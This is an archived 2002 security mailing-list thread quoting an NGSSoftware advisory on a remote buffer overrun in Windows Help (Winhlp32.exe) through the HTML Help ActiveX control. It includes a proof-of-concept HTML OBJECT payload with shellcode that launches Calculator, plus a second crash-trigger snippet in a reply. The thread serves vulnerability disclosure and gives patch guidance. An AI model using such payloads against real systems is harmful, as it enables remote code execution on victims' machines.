OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Mark Litchfield (mark_at_ngssoftware.com)
Date: Tue Aug 06 2002 - 14:23:38 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    If I am not mistaken, I believe that Microsoft are aware of this issue and
    have an IE patch comming out very shortly. My brother reported this to
    them, please see http://www.nextgenss.com/vna/ms-whelp.txt

    Regards

    Cheers,

    Mark Litchfield

    ----- Original Message -----
    From: "Jelmer" <jelmerkuperus.xs4all.nl>
    To: "Next Generation Insight Security Research Team" <markngssoftware.com>;
    <bugtraqsecurityfocus.com>; <ntbugtraqlistser.ntbugtraq.com>
    Sent: Thursday, August 01, 2002 5:19 PM
    Subject: Re: Winhelp32 Remote Buffer Overrun

    > I just installed servicepack 3 and the following code still crashed my my
    > IE6 with a memory could not be refferenced error.
    >
    > <OBJECT ID=hhctrl TYPE="application/x-oleobject"
    > CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
    > <PARAM name="Command" value="Shortcut">
    > <PARAM name="Button" value="Bitmap:shortcut">
    > <PARAM name="Item1" value=",,">
    > <PARAM name="Item2" value="273,1,1">
    > <PARAM name="codebase" value="">
    > <PARAM name="Font" value=" A VERY VERY LONG STRING ">
    > </OBJECT>
    >
    > I have been told this means it is most likely exploitable. I am not into
    > buffer overflows myself though, maybe someone can confirm this. Anyways I
    > notified microsoft of this several months ago. The day after I notified
    them
    > someone pointed me to the ngssoftware advisory *sob*, and I notified
    > microsoft that this was probably the same issue, last I heard from them
    they
    > where looking in to if this was indeed the case. It's been several months
    > and as far as I know they are still looking.
    >
    > --
    > jelmer
    >
    > ----- Original Message -----
    > From: "Next Generation Insight Security Research Team"
    > <markngssoftware.com>
    > To: <bugtraqsecurityfocus.com>; <ntbugtraqlistser.ntbugtraq.com>
    > Sent: Friday, August 02, 2002 3:59 AM
    > Subject: Winhelp32 Remote Buffer Overrun
    >
    >
    > > -----BEGIN PGP SIGNED MESSAGE-----
    > > Hash: SHA1
    > >
    > > NGSSoftware Insight Security Research Advisory
    > >
    > > Name: Winhlp32.exe Remote BufferOverrun
    > > Systems Affected: Win2K Platform
    > > Severity: Critical
    > > Category: Remote Buffer Overrun
    > > Vendor URL: http://www.mircosoft.com
    > > Author: Mark Litchfield (markngssoftware.com)
    > > Date: 1st August 2002
    > > Advisory number: #NISR01082002
    > >
    > >
    > > Description
    > > ***********
    > >
    > > Many of the features available in HTML Help are implemented through
    > > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
    > > control is used to provide navigation features (such as a table of
    > > contents), to display secondary windows and pop-up definitions, and
    > > to provide other features. The HTML Help ActiveX control can be used
    > > from topics in a compiled Help system as well as from HTML pages
    > > displayed in a Web browser. The functionality provided by the HTML
    > > Help ActiveX control will run in the HTML Help Viewer or in any
    > > browser that supports ActiveX technology, such as Internet Explorer
    > > (version 3.01 or later). Some features, as with the WinHlp Command,
    > > provided by the HTML Help ActiveX control are meant to be available
    > > only when it is used from a compiled HTML Help file (.chm) that is
    > > displayed by using the HTML Help Viewer.
    > >
    > > Details
    > > *******
    > >
    > > Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item
    > > parameter within WinHlp Command, the item parameter is used to
    > > specify the file path of the WinHelp (.hlp) file in which the WinHelp
    > > topic is stored, and the window name of the target window. Using
    > > this overrun, an attacker can successfully exectute arbitary code on
    > > a remote system by either encouraging the victim to visit a
    > > particular web page, whereby code would execute automatically, or by
    > > including the exploit within the source of an email. In regards to
    > > email, execution would automatically occur when the mail appears in
    > > the preview pane and ActiveX objects are allowed (This is allowed by
    > > default, the Internet Security Settings would have to be set as HIGH
    > > to prevent execution of this vulnerability). Any exploit would
    > > execute in the context of the logged on user.
    > >
    > > Visual POC Exploit
    > > ******************
    > >
    > > This POC will simply display Calculator. Please note that this
    > > written on a Win2k PC with SP2 installed. I have not tested it on
    > > anything else.
    > >
    > > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
    > > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
    > > type=application/x-oleobject width=0><PARAM NAME="Width"
    > > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
    > > VALUE="WinHelp"><PARAM NAME="Item1"
    > > VALUE="3ĄPhcalc4$&#402;Ą&#1;PVøƧéw’Š3ĄP¾&#8221;éw’ÖAAAAAAAA
    > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    > > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
    > > PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH&#402;Ę&#21;’ęgMyWindow"><PARAM
    > > NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
    > > <SCRIPT>winhelp.HHClick()</SCRIPT>
    > >
    > >
    > > Fix Information
    > > ***************
    > >
    > > NGSSoftware alerted Microsoft to these problems on the 6th March
    > > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
    > > as the fix has been built into this service pack found at
    > > http://www.microsoft.com
    > > An alternative to these patches would be to ensure the security
    > > settings found in the Internet Options is set to high. Despite the
    > > Medium setting, stating that unsigned ActiveX controls will not be
    > > downloaded, Kylie will still execute Calc.exe. Another alternative
    > > would be to remove winhlp32.exe if it is not required within your
    > > environment.
    > > A check for these issues has been added to Typhon II, of which more
    > > information is available from the
    > > NGSSoftware website, http://www.ngssoftware.com.
    > >
    > > Further Information
    > > *******************
    > >
    > > For further information about the scope and effects of buffer
    > > overflows, please see
    > >
    > > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
    > > http://www.ngssoftware.com/papers/ntbufferoverflow.html
    > > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
    > > http://www.ngssoftware.com/papers/unicodebo.pdf
    > >
    > >
    > >
    > >
    > >
    > >
    > >
    > >
    > > -----BEGIN PGP SIGNATURE-----
    > > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
    > >
    > > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
    > > a+qSkYWrz7uspZcqqRTc2r0C
    > > =2PKN
    > > -----END PGP SIGNATURE-----
    > >
    > >
    > >
    > >
    >
    >
    >